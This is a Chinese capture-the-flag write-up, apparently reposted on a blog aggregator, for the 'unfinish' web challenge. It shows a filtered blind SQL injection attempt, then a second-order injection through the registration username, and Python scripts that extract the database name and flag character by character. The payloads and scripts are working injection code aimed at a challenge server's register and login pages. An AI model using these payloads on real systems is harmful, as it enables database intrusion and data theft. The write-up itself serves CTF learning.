攻防世界-web-unfinish-从0到1的解题历程writeup
生活随笔
收集整理的這篇文章主要介紹了
攻防世界-web-unfinish-从0到1的解题历程writeup
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
題目分析
題目描述為:SQL
題目主要功能界面分析:
主要分為注冊、登陸、以及成功登陸后的一個界面。
通過描述可以知道題目應(yīng)該存在SQL注入漏洞。
掃描得知注冊界面存在SQL注入漏洞
嘗試構(gòu)造sql盲注語句如下
{'username': "1' and ELT(left((SELECT schema_name FROM information_schema.schemata limit 0,1),1)='d',SLEEP(5)) or '1'='1", 'password': 'admin', 'email': 'eamil@eamil.com'}得到結(jié)果為
即存在過濾
測試發(fā)現(xiàn)過濾了逗號、information
那么使用盲注應(yīng)該不太行了,但是username這邊的內(nèi)容是可以執(zhí)行,所以我們將username的值拼接上查找出來的內(nèi)容,利用登陸后會顯示用戶名做到一個二次注入的效果。
解題流程
首先可知注冊的sql語句應(yīng)該為
insert into tables values('$email','$username','$password')我們通過控制post的參數(shù)
構(gòu)造sql語句為:
insert into tables values('admin1@admin.com','0'+ascii(substr((select database()) from 1 for 1))+'0','admin')即插入的username即拼接上了我們要查找的
查數(shù)據(jù)庫腳本如下
import requests import time from bs4 import BeautifulSoup #html解析器def getDatabase():database = ''for i in range(10):data_database = {'username':"0'+ascii(substr((select database()) from "+str(i+1)+" for 1))+'0",'password':'admin',"email":"admin11@admin.com"+str(i)}#注冊requests.post("http://159.138.137.79:52974/register.php",data_database)login_data={'password':'admin',"email":"admin11@admin.com"+str(i)}response=requests.post("http://159.138.137.79:52974/login.php",login_data)html=response.text #返回的頁面soup=BeautifulSoup(html,'html.parser')getUsername=soup.find_all('span')[0]#獲取用戶名username=getUsername.textif int(username)==0:breakdatabase+=chr(int(username))return databaseprint(getDatabase())得到數(shù)據(jù)庫名為web
然后嘗試獲取表名失敗,因為過濾了information
看了評論說表名全靠猜哈哈
還是給上一個獲取flag的腳本
腳本中途獲取表名失敗了,被我注釋了~~emmm
import requests import time from bs4 import BeautifulSoup #html解析器def getDatabase():database = ''for i in range(10):data_database = {'username':"0'+ascii(substr((select database()) from "+str(i+1)+" for 1))+'0",'password':'admin',"email":"admin11@admin.com"+str(i)}#注冊requests.post("http://159.138.137.79:52974/register.php",data_database)login_data={'password':'admin',"email":"admin11@admin.com"+str(i)}response=requests.post("http://159.138.137.79:52974/login.php",login_data)html=response.text #返回的頁面soup=BeautifulSoup(html,'html.parser')getUsername=soup.find_all('span')[0]#獲取用戶名username=getUsername.textif int(username)==0:breakdatabase+=chr(int(username))return databaseprint(getDatabase())def getTables():tables = ''for i in range(10):data_tables = {'username':"0'+ascii(substr((select tables()) from "+str(i+1)+" for 1))+'0",'password':'admin',"email":"admin12@admin.com"+str(i)}#注冊requests.post("http://159.138.137.79:52974/register.php",data_tables)login_data={'password':'admin',"email":"admin12@admin.com"+str(i)}response=requests.post("http://159.138.137.79:52974/login.php",login_data)html=response.text #返回的頁面soup=BeautifulSoup(html,'html.parser')getUsername=soup.find_all('span')[0]#獲取用戶名username=getUsername.textif int(username)==0:breaktables+=chr(int(username))return tables ''' print(getTables()) '''def getFlag():flag = ''for i in range(40):data_flag = {'username':"0'+ascii(substr((select * from flag) from "+str(i+1)+" for 1))+'0",'password':'admin',"email":"admin32@admin.com"+str(i)}#注冊requests.post("http://159.138.137.79:52974/register.php",data_flag)login_data={'password':'admin',"email":"admin32@admin.com"+str(i)}response=requests.post("http://159.138.137.79:52974/login.php",login_data)html=response.text #返回的頁面soup=BeautifulSoup(html,'html.parser')getUsername=soup.find_all('span')[0]#獲取用戶名username=getUsername.textif int(username)==0:breakflag+=chr(int(username))return flagprint(getFlag())總結(jié)
以上是生活随笔為你收集整理的攻防世界-web-unfinish-从0到1的解题历程writeup的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 攻防世界-web-i-got-id-20
- 下一篇: 简单介绍基于Spring Boot的项目